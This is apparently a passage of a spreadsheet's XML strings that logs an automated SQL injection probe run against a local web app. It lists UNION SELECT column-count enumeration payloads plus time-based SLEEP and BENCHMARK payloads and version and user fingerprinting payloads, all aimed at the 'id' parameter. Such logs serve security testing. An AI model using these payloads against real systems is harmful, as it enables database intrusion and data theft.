    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:54 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:55 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:56 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:57 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),3</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),3]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),4</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),4]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:58 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:59 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:00 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),%22'3</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),"'3]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),%22'3'%22%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),"'3'"#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),4%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),4#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:01 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:02 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:03 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#]</t>
